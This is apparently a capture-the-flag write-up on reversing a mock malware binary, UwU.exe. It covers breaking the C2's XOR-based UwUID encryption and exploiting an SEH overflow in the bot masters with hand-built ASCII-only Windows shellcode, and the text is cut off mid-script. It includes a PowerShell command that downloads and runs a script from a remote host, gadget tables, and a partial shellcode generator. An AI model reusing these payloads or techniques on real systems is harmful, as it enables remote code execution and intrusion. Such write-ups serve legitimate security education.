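The loop above is a rolling XOR against the little-endian bytes of the constant 0x5AA5D2B4D39B2B69, so such strings could also be decoded statically. A minimal sketch; since XOR is its own inverse, a round trip on a known plaintext demonstrates the keystream (the ciphertext here is derived for illustration, not dumped from the binary):

```python
KEY = 0x5AA5D2B4D39B2B69

def xor_decrypt(data: bytes) -> bytes:
    # Mirrors the decompiled loop: byte i is XORed with
    # (KEY >> (8 * (i & 7))) & 0xFF, i.e. the key's little-endian bytes repeated.
    return bytes(b ^ ((KEY >> (8 * (i & 7))) & 0xFF) for i, b in enumerate(data))

# XOR is symmetric, so the same function applied to encrypted bytes dumped
# from the binary would recover strings like "Not registered".
ciphertext = xor_decrypt(b"Not registered")
assert xor_decrypt(ciphertext) == b"Not registered"
```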
The first question I wanted to answer was how the binary generated the seemingly random a
, b
, c
, d
, and e
parameters in the POST /register.php
request. I found the obfuscated loop further down in the main
function.
for ( j = 9; ; j = 1401 )
{
    while ( j <= 18 )
    {
        if ( j == 18 )
        {
            v34 = mersenne_rng_with_b62(v44);   // generate b parameter
            sub_55757100(v34);
            if ( v46 >= 0x10 )
            {
                v31 = v44[0];
                v32 = v46 + 1;
                if ( v46 + 1 >= 0x1000 )
                {
                    v31 = *(_DWORD *)(v44[0] - 4);
                    v32 = v46 + 36;
                    if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                        goto LABEL_66;
                }
                v40 = v32;
                sub_5575B048(v31);
            }
            j = 4;
        }
        else if ( j == 4 )
        {
            v33 = mersenne_rng_with_b62(v44);   // generate c parameter
            sub_55757100(v33);
            if ( v46 >= 0x10 )
            {
                v31 = v44[0];
                v32 = v46 + 1;
                if ( v46 + 1 >= 0x1000 )
                {
                    v31 = *(_DWORD *)(v44[0] - 4);
                    v32 = v46 + 36;
                    if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                        goto LABEL_66;
                }
                v40 = v32;
                sub_5575B048(v31);
            }
            j = 64;
        }
        else
        {
            v30 = mersenne_rng_with_b62(v44);   // generate a parameter
            sub_55757100(v30);
            if ( v46 >= 0x10 )
            {
                v31 = v44[0];
                v32 = v46 + 1;
                if ( v46 + 1 >= 0x1000 )
                {
                    v31 = *(_DWORD *)(v44[0] - 4);
                    v32 = v46 + 36;
                    if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                        goto LABEL_66;
                }
                v40 = v32;
                sub_5575B048(v31);
            }
            j = 18;
        }
    }
    if ( j != 64 )
        break;
    v36 = mersenne_rng_with_b62(v44);           // generate d parameter
    sub_55757100(v36);
    if ( v46 >= 0x10 )
    {
        v31 = v44[0];
        v32 = v46 + 1;
        if ( v46 + 1 >= 0x1000 )
        {
            v31 = *(_DWORD *)(v44[0] - 4);
            v32 = v46 + 36;
            if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                goto LABEL_66;
        }
        v40 = v32;
        sub_5575B048(v31);
    }
}
v35 = mersenne_rng_with_b62(v44);               // generate e parameter
v35 = mersenne_rng_with_b62(v44); // generate e parameter
Each parameter was 6 characters selected using a Mersenne Twister pseudo-random number generator algorithm from the base62 alphabet in the mersenne_rng_with_b62
function.
_DWORD *__usercall mersenne_rng_with_b62@<eax>(_DWORD *a1@<ecx>, int a2@<edi>, int a3@<esi>)
{
    _EXCEPTION_REGISTRATION_RECORD *v3; // eax
    void *v4; // esp
    unsigned int seed; // eax
    unsigned int i; // edx
    int v8; // edi
    int extracted_number; // eax
    unsigned int v10; // edx
    unsigned int v11; // ecx
    _DWORD *v12; // eax
    _BYTE *v13; // eax
    char v14; // cl
    int v17; // [esp+0h] [ebp-13CCh] BYREF
    int v18[1259]; // [esp+4h] [ebp-13C8h]
    int v19; // [esp+13B0h] [ebp-1Ch]
    int v20; // [esp+13B4h] [ebp-18h]
    char *base62_alphabet; // [esp+13B8h] [ebp-14h]
    int v22; // [esp+13BCh] [ebp-10h]
    _EXCEPTION_REGISTRATION_RECORD *v23; // [esp+13C0h] [ebp-Ch]
    char *v24; // [esp+13C4h] [ebp-8h]
    int v25; // [esp+13C8h] [ebp-4h]

    v25 = -1;
    v3 = NtCurrentTeb()->NtTib.ExceptionList;
    v24 = byte_5575CBE6;
    v23 = v3;
    v4 = alloca(5056);
    v18[1255] = (int)a1;
    v20 = 0;
    v18[1253] = 62;
    base62_alphabet = (char *)operator new(0x40u);
    v18[1254] = 63;
    v18[1249] = (int)base62_alphabet;
    strcpy(base62_alphabet, "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz");// base62
    v25 = 1;
    seed = std::_Random_device(a2, a3);
    v18[1248] = -1;
    i = 1;
    v18[0] = seed;
    do // Initialise the generator from a seed
    {
        seed = i + 1812433253 * (seed ^ (seed >> 30));// Initialise Mersenne Twister with constant 1812433253
        v18[i++] = seed;
    }
    while ( i < 0x270 );
    *a1 = 0;
    a1[4] = 0;
    a1[5] = 15;
    *(_BYTE *)a1 = 0;
    v17 = 624;
    a1[4] = 0;
    *(_BYTE *)a1 = 0;
    v20 = 1;
    v18[1256] = (int)&v17;
    v8 = 6;
    v18[1257] = 32;
    v18[1258] = -1;
    do
    {
        extracted_number = get_next_mod_62(62); // Retrieve next Mersenne PRNG number mod 62
        v10 = a1[5];
        v11 = a1[4];
        LOBYTE(v22) = base62_alphabet[extracted_number];// Used number as offset in base62 alphabet
        if ( v11 >= v10 )
        {
            LOBYTE(v19) = 0;
            sub_557595E0(v11, v19, v22);
        }
        else
        {
            a1[4] = v11 + 1;
            v12 = a1;
            if ( v10 >= 0x10 )
                v12 = (_DWORD *)*a1;
            v13 = (char *)v12 + v11;
            v14 = v22;
            v13[1] = 0;
            *v13 = v14;
        }
        --v8;
    }
    while ( v8 );
    sub_5575B048(base62_alphabet);
    return a1;
}
I recognised the Mersenne Twister due to the presence of constants such as 1812433253
. At this point, I fell down another hilarious rabbit hole. Apparently, the constants used by the program's Mersenne Twister matched those used to encrypt several Japanese game files. This led me to a game modder's decryption script that included the following comment:
UwU indeed. I burned a few more hours chasing this false lead due to my faith in a fellow man of culture. Ultimately, I decided that the program only used the Mersenne Twister to generate random characters and nothing more.
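The seeding loop in the decompiled code is the standard MT19937 initialisation, which is what gave the constant away. A sketch of the recurrence, plus a stand-in for how mersenne_rng_with_b62 appears to draw six base62 characters (the binary's exact extraction and tempering steps are assumptions here; Python's own random is MT19937-backed):

```python
import random
import string

def mt19937_init(seed):
    # Standard MT19937 state initialisation, matching the decompiled loop:
    # state[i] = (i + 1812433253 * (state[i-1] ^ (state[i-1] >> 30))) mod 2^32.
    state = [seed & 0xFFFFFFFF]
    for i in range(1, 624):
        prev = state[-1]
        state.append((i + 1812433253 * (prev ^ (prev >> 30))) & 0xFFFFFFFF)
    return state

BASE62 = string.digits + string.ascii_uppercase + string.ascii_lowercase

def random_param(rng):
    # Six characters chosen by taking a PRNG output mod 62 as an index
    # into the base62 alphabet, as the decompiled do/while loop does.
    return "".join(BASE62[rng.getrandbits(32) % 62] for _ in range(6))

state = mt19937_init(5489)  # 5489 is the reference seed from the MT19937 paper
param = random_param(random.Random())
assert len(param) == 6 and all(c in BASE62 for c in param)
```

Reproducing the a–e parameters exactly would require the binary's seed from std::_Random_device, which is why this path turned out to be a dead end for prediction.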
Since these values were indeed (pseudo)randomly generated, perhaps they served as an encryption key for future communications with the server – a common pattern in C2 frameworks. I tried base62-decoding the parameters but only got gibberish. Next, I recalled that the dashboard on the website provided five Bot Master UwUIDs:
Here is a list of Bot Master UwUIDs:
- 715cf1a6-c0de-4a55-b055-c0ffeec0ffee
- 715cf1a6-baba-4a55-b0b0-c0ffeec0ffee
- 715cf1a6-510b-4a55-ba11-c0ffeec0ffee
- 715cf1a6-dead-4a55-a1d5-c0ffeec0ffee
- 715cf1a6-51de-4a55-be11-c0ffeec0ffee
However, these UwUIDs looked different from the UwUID returned from the registration HTTP request, such as oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma
. This base64 string decoded to 36 bytes – the same number of bytes as the Bot Master UwUIDs in plaintext.
Perhaps the base64 string was simply an encoded version of a plaintext UwUID matching the pattern <4 HEX BYTES>-<2 HEX BYTES>-<2 HEX BYTES>-<2 HEX BYTES>-<6 HEX BYTES>
. How could I decrypt them though?
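The length observation is easy to confirm: the registration response is 48 unpadded base64 characters, which decode to exactly 36 bytes, the length of a plaintext UwUID.

```python
import base64

encrypted_uwuid = "oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma"
plaintext_uwuid = "715cf1a6-c0de-4a55-b055-c0ffeec0ffee"

decoded = base64.b64decode(encrypted_uwuid)
# 48 base64 characters * 3/4 = 36 bytes, matching the plaintext UwUID length,
# which hints at a stream cipher rather than a padded block cipher.
assert len(decoded) == 36 == len(plaintext_uwuid)
```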
I began fuzzing the POST /register.php
request with different parameters. I noticed after a while that if I kept the parameters the same but kept repeating the request, I would eventually get the same encrypted UwUID again. Furthermore, after fuzzing too many times, I somehow crashed the encrypted UwUID generator (the organisers had to reset it) and began receiving only MDAwMDA=
, which base64-decoded to 00000
.
After many failed attempts, I began to wonder if I missed some crucial information. Since I downloaded the binary from http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/UwU.exe
, I began fuzzing http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/<FUZZ>
. As it turned out, http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/
was a simple directory listing that included README.txt
.
I opened the README and found out what I had been missing.
Congratulations, PALINDROME Member! You are now a proud UwUser of our latest malware, UwU.exe!
Before running the malware on your victim, it is important that the victim is a soft target. Ie, the win10 exploit mitigations should be disabled first (see https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#table-2configurable-windows-10-mitigations-designed-to-help-protect-against-memory-exploits). Win 8.1 and below are all fair game!
Upon running the malware, you will see several options. Namely:
Register Bird
Send Message
Receive Messages
Display Killswitch
Exit
You should first register the malware (the Bird) with the C2 Server (the Birdwatcher), which is a server such as this one.
After that, you can send and receive messages, to communicate with the other registered Birds! Simply send the message to their UwUIDs (which will be assigned to you upon registering).
Each C2 Server will have several Big Birds as bot masters, which are essentially an identical copy of the malware you've received, but with a special killswitch only available for the Big Birds.
Also, you do not need to worry if the bot masters are taken offline. They will restart and reconnect to the C2 Server automatically!
This clarified things for me. I could contact the bot masters by sending them a message, so perhaps I could send some kind of payload to gain control of them. I set up my own fake C2 server in Python to test this theory.
from http.server import HTTPServer, BaseHTTPRequestHandler
from struct import pack
## from http.server import SimpleHTTPRequestHandler
import datetime
port = 8081
payload = b'A' * 2000
class myHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        # Send the html message
        if self.path == '/register.php':
            # self.wfile.write(b'A' * 100000)
            self.wfile.write(
                b'40K8avCKsxKhO6OJ4Am4bq3bqEW6PvfG5hfpPKLeskDqZPHc')
        elif self.path == '/receive.php':
            self.wfile.write(payload)
        return

class StoppableHTTPServer(HTTPServer):
    def run(self):
        try:
            self.serve_forever()
        except KeyboardInterrupt:
            pass
        finally:
            # Clean-up server (close socket, etc.)
            self.server_close()

if __name__ == '__main__':
    server = HTTPServer(('127.0.0.1', 8081), myHandler)
    server.serve_forever()
I started the server and began receiving messages from my local UwU.exe
. However, nothing happened. Wireshark showed that the messages were received by UwU.exe
, but for some reason it did not parse them. By debugging the program and reviewing the “Receive Messages” function in IDA, I discovered that it performed the following check after receiving the message:
if ( (_DWORD)v82 != 3
  || ((v46 = v6->m128i_i8[0] < 0x55u, v6->m128i_i8[0] != 85)      // Check if first character is U
      || (second_char = v6->m128i_i8[1], v46 = (unsigned __int8)second_char < 0x77u, second_char != 119)// Check if second character is w
      || (third_char = v6->m128i_i8[2], v46 = (unsigned __int8)third_char < 0x55u, third_char != 85) ? (v49 = v46 ? -1 : 1) : (v49 = 0),// Check if third character is U
      is_valid_message = 1,
      v49) )
{
    is_valid_message = 0;
}
if ( HIDWORD(v82) >= 0x10 )
{
    v50 = HIDWORD(v82) + 1;
    if ( (unsigned int)(HIDWORD(v82) + 1) >= 0x1000 )
    {
        v18 = *(_DWORD *)(v81.m128i_i32[0] - 4);
        v50 = HIDWORD(v82) + 36;
        if ( v81.m128i_i32[0] - v18 - 4 > 0x1F )
            goto LABEL_141;
    }
    v66 = (__m128i *)v50;
    sub_5575B048(v18);
}
if ( is_valid_message )
{
    <COPY RESPONSE DATA TO BUFFER>
This meant that the message had to match the format UwU<MESSAGE>
. I corrected my server code and tried again. This time, I got a crash:
(3978.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify timestamp for C:\Users\Eugene\Desktop\tisc\10\UwU_unpacked.exe
eax=41414141 ebx=004854a0 ecx=41414141 edx=41414142 esi=0019fcb4 edi=000001ff
eip=55752d5a esp=0019fc80 ebp=0019fcac iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
UwU_unpacked+0x2d5a:
55752d5a 8b49fc mov ecx,dword ptr [ecx-4] ds:002b:4141413d=????????
0:000> !exchain
0019fca0: 41414141
Invalid exception stack at 41414141
0:000> g
(3978.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=773985f0 esi=00000000 edi=00000000
eip=41414141 esp=0019f648 ebp=0019f668 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
I had triggered an SEH overflow, one of the easiest overflows to exploit. To add to my excitement, I determined that UwU.exe
did not include any memory protections like DEP or ASLR thanks to the MPRESS packer. I easily generated a local proof-of-concept to execute Meterpreter shellcode via the overflow in the message. First, I determined that the offset to the overwritten SEH address was 36. Next, I used a simple POP POP RET
payload with a JMP 0x08
instruction to get to my shellcode, just like in the basic tutorials. However, it was never going to be that easy. Even though the exploit worked locally, when I sent this to the bot master UwUIDs using the POST /send.php
endpoint, nothing happened.
After several more angst-filled hours and confirming with the organisers that the network was working properly, I decided that this was a dead end. The C2 endpoint seemed to be filtering my payloads but I could not find out how it was doing so unless I sent messages to my own instances using the real C2. That required an unencrypted UwUID.
I recalled that the base64-decoded encrypted UwUID had the same number of bytes as the unencrypted plaintext bot master UwUIDs – 36. This suggested that the C2 used a stream cipher because stream ciphers generate the ciphertext by XORing each byte of the plaintext against a keystream, creating a ciphertext of the same length as the plaintext. If the C2 used a block cipher like AES, the plaintext would be padded to the block size length before being encrypted, causing the length of the ciphertext to be greater than the length of the plaintext.
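The length reasoning can be sketched as a toy comparison, assuming a 16-byte block size and PKCS#7-style padding for the block-cipher case:

```python
def stream_len(n: int) -> int:
    # A stream cipher XORs plaintext against the keystream byte-for-byte,
    # so the ciphertext length equals the plaintext length.
    return n

def block_len(n: int, block: int = 16) -> int:
    # PKCS#7 padding always rounds up to the next full block,
    # adding an entire block when the length is already aligned.
    return (n // block + 1) * block

# A 36-byte UwUID stays 36 bytes under a stream cipher, but would
# grow to 48 bytes under a 16-byte block cipher like AES.
assert stream_len(36) == 36 and block_len(36) == 48
```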
I began researching various ways to break stream ciphers from a black box perspective. Once again, Stack Overflow came to my rescue. One of the answers described a known-plaintext attack against RC4. If the encryption service used the same key each time it encrypted something, the keystream would be the same for all inputs. Since each ciphertext was simply the plaintext XOR keystream, I could retrieve the XOR of two plaintexts by XORing their ciphertexts.
KS = RC4(K)
C1 = KS XOR M1
C2 = KS XOR M2
C1 XOR C2 = (KS XOR M1) XOR (KS XOR M2) = M1 XOR M2
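A minimal sketch of this cancellation in Python, reusing the parameter values from my registrations (the keystream bytes here are arbitrary stand-ins for RC4 output; the property only needs the keystream to be reused):

```python
def xor(data: bytes, key: bytes) -> bytes:
    # XOR data against a (repeated) key/keystream.
    return bytes(a ^ b for a, b in zip(data, key * (len(data) // len(key) + 1)))

ks = bytes.fromhex("e771c40aa589") * 6  # stand-in for a reused RC4 keystream
m1 = b"pFvulv" * 6
m2 = b"XH2CPq" * 6
c1, c2 = xor(m1, ks), xor(m2, ks)
# The keystream cancels out: C1 XOR C2 == M1 XOR M2, no key required.
assert xor(c1, c2) == xor(m1, m2)
```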
I tried this out by registering twice with the same parameters to get two different ciphertexts. For example, with a=roVwGx&b=gD4ZuM&c=pFvulv&d=XH2CPq&e=I3Yonk
, I got oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma
and iVrBK8DOiQrbesHIjhTCf8LMkgHDe8bVhw+TcMGb3AqSL8Wd
. Next, I base64-decoded them and XORed them together. This returned the XOR of the two plaintexts, (.D6<.(.D6<.(.D6<.(.D6<.(.D6<.(.D6<.
which was a repeating series of 6 bytes:
28 0e 44 36 3c 07
28 0e 44 36 3c 07
28 0e 44 36 3c 07
28 0e 44 36 3c 07
28 0e 44 36 3c 07
28 0e 44 36 3c 07
What did this mean? Since the randomly-generated parameters made up 6 bytes each, I decided to try XORing this output again with each of the parameters. Voila: the mysterious 6 bytes were simply pFvulv
(parameter c
) XORed with XH2CPq
(parameter e
). This meant that the C2 cipher randomly selected one of the parameters at registration and repeated it 6 times to create the plaintext.
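This checks out directly against the two ciphertexts above:

```python
import base64

c1 = base64.b64decode("oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma")
c2 = base64.b64decode("iVrBK8DOiQrbesHIjhTCf8LMkgHDe8bVhw+TcMGb3AqSL8Wd")
diff = bytes(a ^ b for a, b in zip(c1, c2))
# The XOR is six repetitions of 28 0e 44 36 3c 07 ...
assert diff == bytes.fromhex("280e44363c07") * 6
# ... which is exactly parameter c ("pFvulv") XORed with parameter e ("XH2CPq").
assert diff == bytes(a ^ b for a, b in zip(b"pFvulv" * 6, b"XH2CPq" * 6))
```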
However, while this explained why the encrypted UwUIDs repeated over time, this looked nothing like a plaintext UwUID. I also retrieved the keystream by XORing the plaintexts with their respective ciphertexts but did not get anything interesting.
Thinking further, I recalled an interesting observation from when I crashed the C2 encrypting function. While I was waiting for the organisers to fix the problem, I tried registering from a remote DigitalOcean Droplet instance and successfully retrieved valid encrypted UwUIDs even though I was unable to do so from my home network. This suggested that the encryption relied on the IP address. I logged into the remote instance and tried generating encrypted UwUIDs with the exact same parameters I had been using. It returned encrypted UwUIDs that were completely different from the ones I had generated from my home network, confirming the IP address hunch. I repeated the same process to retrieve the keystream and compared it to the keystream for my home network.
Keystream 1: d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8
Keystream 2: d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec
I noticed that some bytes matched at the same positions in both keystreams. Most of these were in the same positions as the dash characters in the unencrypted master UwUIDs.
Keystream 1: d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8
Keystream 2: d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec
MasterUwUID: 7 1 5 c f 1 a 6 - 5 1 d e - 4 a 5 5 - b e 1 1 - c 0 f f e e c 0 f f e e
This strongly signalled that a double-layer known-plaintext attack was at work. The keystream specific to each IP address used to encrypt the random 6-character parameter values was itself a ciphertext generated by XORing the plaintext UwUID belonging to the IP address with a master keystream. Since all plaintext UwUIDs had dash characters in the same positions, their IP address-specific keystreams would also have the same XOR result in those positions.
MASTER_KS = RC4(MASTER_K)
KS1 = MASTER_KS XOR UWUID1
KS2 = MASTER_KS XOR UWUID2
C1 = KS1 XOR RANDOMLY_SELECTED_PARAMETER_VALUE1
C2 = KS2 XOR RANDOMLY_SELECTED_PARAMETER_VALUE2
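Under this model, the dash alignment is easy to verify with the two keystreams above (dash offsets follow the standard 8-4-4-4-12 UUID layout):

```python
ks1 = bytes.fromhex("d510a732c3bdd146e96896bcd05cf06993b9ca48f66e96a48443f23f9de8d712a66e95e8")
ks2 = bytes.fromhex("d112f36890bfd142e93991b9d65cf03c92bdca49f13896a4df47a13391ea8442a06c95ec")
# UwUIDs are formatted 8-4-4-4-12, so dashes sit at offsets 8, 13, 18, 23.
DASHES = [8, 13, 18, 23]
diff = bytes(a ^ b for a, b in zip(ks1, ks2))
# KS_i = MASTER_KS XOR UWUID_i, so at dash positions the UwUID bytes
# cancel ('-' XOR '-' == 0) and the two keystreams must agree exactly.
assert all(diff[i] == 0 for i in DASHES)
```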
This explained why, when I sent the same parameter values from different IP addresses, the encrypted UwUIDs never matched. But how could I retrieve the master keystream? Other than the dashes, I knew that the plaintext UwUIDs consisted of hexadecimal characters, i.e. 0-9a-f
. With enough individual keystream samples, I could brute force all possible master keystream bytes and select the right one based on whether the candidate byte at position x XORed with all of the keystreams' bytes at position x always returned a byte in the range ASCII 0-9a-f
.
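This brute force can be sketched directly using the two keystreams shown above (`candidates` and `ALLOWED` are my own names):

```python
# The two IP-specific keystreams recovered earlier (36 bytes each).
ks_samples = [
    bytes.fromhex("d510a732c3bdd146e96896bcd05cf06993b9ca48f66e96a48443f23f9de8d712a66e95e8"),
    bytes.fromhex("d112f36890bfd142e93991b9d65cf03c92bdca49f13896a4df47a13391ea8442a06c95ec"),
]
# Plaintext UwUIDs consist only of lowercase hex digits and dashes.
ALLOWED = set(b"0123456789abcdef-")

def candidates(pos: int) -> list:
    # A master-keystream byte k is viable at position pos only if
    # k XOR every sampled keystream byte decodes to a UwUID character.
    return [k for k in range(256)
            if all(ks[pos] ^ k in ALLOWED for ks in ks_samples)]

# With only two samples, several candidates survive per position; more
# keystreams from more IP addresses narrow each position to one byte.
master = bytes.fromhex("e771c40aa589")  # the recovered repeating block
assert all(master[i] in candidates(i) for i in range(6))
```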
Using my favourite VPN, NordVPN, I set to work. I generated and retrieved 13 different keystreams from 13 different IP addresses, then used the CyberChef XOR brute force filter to manually check which byte matched. Byte by byte, the keystream emerged. Fortunately, I realised that the master keystream was actually a series of 6 repeating bytes, e7 71 c4 0a a5 89
. Next, I XORed the individual keystreams against the master keystream. To my delight, this resulted in legitimate plaintext UwUIDs.
With the plaintext UwUID for my IP address, I sent a message using the POST /send.php
endpoint, then checked the POST /receive.php
endpoint with the encrypted UwUID. The message came through! Now, I could finally figure out why my payloads weren't working. Immediately, I realised that any payload above a certain length resulted in an empty message. I gradually narrowed down the maximum length to 328. Additionally, the first 32 bytes were rewritten to UwUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
. Finally, there were a few bad characters like \x25\x26\x2b
. Fortunately, this seemed pretty manageable.
Or so I thought. Not long after, I received a notification from the organisers that they had fixed a bug in the servers. When I retried the receive endpoints, I realised that the number of bad bytes had increased enormously – any byte from \x80
onwards was nulled out. In other words, I had to write ASCII-only shellcode.
While I was fairly comfortable with writing Windows shellcode thanks to the Offensive Security Exploit Developer (OSED) course, I had never faced such severe restrictions before. There were a few writeups on ASCII-only Linux shellcode online but I could not find one for Windows that matched my length requirements.
After the initial panic, I settled on my plan of action. First, I noticed that UwU.exe
imported GetProcAddress
and GetModuleHandleW
, so I could dereference those functions from fixed addresses in the Import Address Table of the executable (remember there were no memory protections like ASLR) and use them to retrieve the address of WinExec
from Kernel32
. Afterwards, I could call WinExec
with my desired commands. To build my shellcode, I heavily modified a Windows shellcode generation script I had previously used for OSED. After doing some research, I also found a useful Linux ASCII shellcode writeup that highlighted several useful gadgets:
# h4W1P - push 0x50315734 # + pop eax -> set eax
# 5xxxx - xor eax, xxxx # use xor to generate string
# j1X41 - eax <- 0 # clear eax
# 1B2 - xor DWORD PTR [edx+0x32], eax # assign value to shellcode
# 2J2 - xor cl, BYTE PTR [edx+0x32] # nop
# 41 - xor al, 0x31 # nop
# X - pop eax
# P - push eax
In particular, I could use xor DWORD PTR [edx+0x32], eax
to decode non-ASCII instructions when I could not find a suitable ASCII replacement.
Finally, I found the smallest null-free WinExec shellcode to use as a reference.
With these tools in hand, I began to craft my shellcode. Starting from the top, I replaced my original POP POP RET
pointer 0x55758b55
with 0x55756e78
which pointed to pop ebx ; pop ebp ; retn 0x0004
to meet the ASCII character requirements. I also replaced the non-ASCII JMP 0x8
(eb 06
) with the ASCII-only JNS 0x8
(79 06
). Afterwards, I used the xor DWORD PTR [edx+0x32], eax
decoder gadget for my shellcode. My first draft relied heavily on this gadget and did not replace many non-ASCII instructions. I also originally tried to use GetModuleHandleW
and GetProcAddress
to resolve the address of WinExec
. However, for some reason or another, GetProcAddress
simply did not work, even though GetModuleHandleW
worked perfectly. I suspected that this was some strange wide string versus regular string bug but could not fix it even after debugging with GetLastError
. It could also have been due to Import Address Filter protections but I could not confirm if that flag was turned on.
Giving up on GetProcAddress
, I decided to pass the base address of Kernel32
I had retrieved with GetModuleHandleW
to the function search loop used in my reference shellcode. With lots of effort, I eventually got my patchwork payload to work and execute a simple calc
. Next, I modified it to powershell iex $(irm http://<IP ADDRESS>)
to download and execute a remote PowerShell script. Although this worked on my local instances, it failed when I tried it on the master UwUIDs – an increasingly common pattern. As I was working without any visibility of the bot masters, I faced huge difficulties trying to figure out why it was failing. After hours of frustration, I decided to focus on cleaning up my shellcode – perhaps the messy shellcode caused problems.
Firstly, my over-reliance on the decoding gadget created lots of unnecessary instructions, reducing the number of bytes available for my WinExec
command. I bit the bullet and tried to convert some of the encoded bytes to true ASCII shellcode. I discovered a few useful gadgets to replace these instructions with their ASCII equivalents.
| Non-ASCII Bytes | Non-ASCII Instructions | ASCII Bytes | ASCII Instructions |
| --- | --- | --- | --- |
| 01 fe | add esi, edi; | 57 03 34 24 | push edi; add esi, DWORD PTR [esp]; |
| 8b 74 1f 1c | mov esi, DWORD PTR [edi+ebx*1+0x1c]; | 5e 33 74 1f 1c | pop esi; xor esi, DWORD PTR [edi+ebx*1+0x1c]; |
| 31 db | xor ebx, ebx; | 53 33 1c 24 | push ebx; xor ebx, DWORD PTR [esp]; |
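As a sanity check, each replacement can be tested against the byte filter described earlier (a sketch assuming the observed constraints: bytes from \x80 onwards plus \x25, \x26 and \x2b are bad):

```python
# Byte filter observed on the C2: \x25, \x26, \x2b are bad characters,
# and after the server "fix" everything from \x80 onwards is nulled out.
BAD = {0x25, 0x26, 0x2B}

def payload_safe(code: bytes) -> bool:
    return all(b < 0x80 and b not in BAD for b in code)

# Each replacement from the table trades filtered bytes for safe ones.
replacements = {
    bytes.fromhex("01fe"):     bytes.fromhex("57033424"),    # add esi, edi
    bytes.fromhex("8b741f1c"): bytes.fromhex("5e33741f1c"),  # mov esi, [edi+ebx+0x1c]
    bytes.fromhex("31db"):     bytes.fromhex("53331c24"),    # xor ebx, ebx
}
for before, after in replacements.items():
    assert not payload_safe(before) and payload_safe(after)
```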
The only non-ASCII instructions I could not replace were the CALL
and negative short JMP
instructions, so I continued to rely on the decoder gadget for those. Thanks to these optimisations, I cut the number of decoder gadgets by two-thirds and freed up 40 bytes – a fortune in shellcode. I now had 76 bytes for my command argument. I also patched a bug where Windows 7 needed a valid uCmdShow
argument for WinExec
– Windows 8 and 10 gracefully dealt with any invalid uCmdShow
arguments. My new and improved shellcode worked much more reliably.
#!/usr/bin/python3
import argparse
import keystone as ks
from struct import pack
def to_hex(s):
retval = list()
for char in s:
retval.append(hex(ord(char)).replace("0x", ""))
return "".join(retval)
def push_string(input_string):
rev_hex_payload = str(to_hex(input_string))
rev_hex_payload_len = len(rev_hex_payload)
instructions = []
first_instructions = []
null_terminated = False
for i in range(rev_hex_payload_len, 0, -1):
# add every 4 byte (8 chars) to one push statement
if ((i != 0) and ((i % 8) == 0)):
target_bytes = rev_hex_payload[i-8:i]
instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
# handle the left over instructions
elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
if (rev_hex_payload_len % 8 == 2):
first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
first_instructions.append("push eax;")
elif (rev_hex_payload_len % 8 == 4):
target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
first_instructions.append("push eax;")
else:
target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
first_instructions.append("push eax;")
first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
first_instructions.append("push ax;")
null_terminated = True
instructions = first_instructions + instructions
asm_instructions = "".join(instructions)
return asm_instructions
def ascii_shellcode(breakpoint=0):
command = "calc"
if len(command) > 76:
exit(1)
command += " " * (76 - len(command)) # amount of padding available
asm = [
# at start, eax, esi, edi are nulled
" start: ",
f"{['', 'int3;'][breakpoint]} ",
" pop edx ;",
" pop edx ;", # Pointer to shellcode in edx
" xor al, 0x7f;", # inc eax to 0x80 which xors out the ones that are out of reach
" inc eax;",
" xor dword ptr [edx+0x6e], eax;", # correct ff d7 call edi
" xor dword ptr [edx+0x6f], eax;", # correct ff d7 call edi
" push 0x7f;", # dont need ebx, use eax
" pop ebx;",
" xor dword ptr [edx+ebx+0x24], eax;", # correct ad lods eax,dword ptr ds:[esi]
" xor dword ptr [edx+ebx+0x29], eax;", # correct 75 ed jne 0x68
" push 0x7f;",
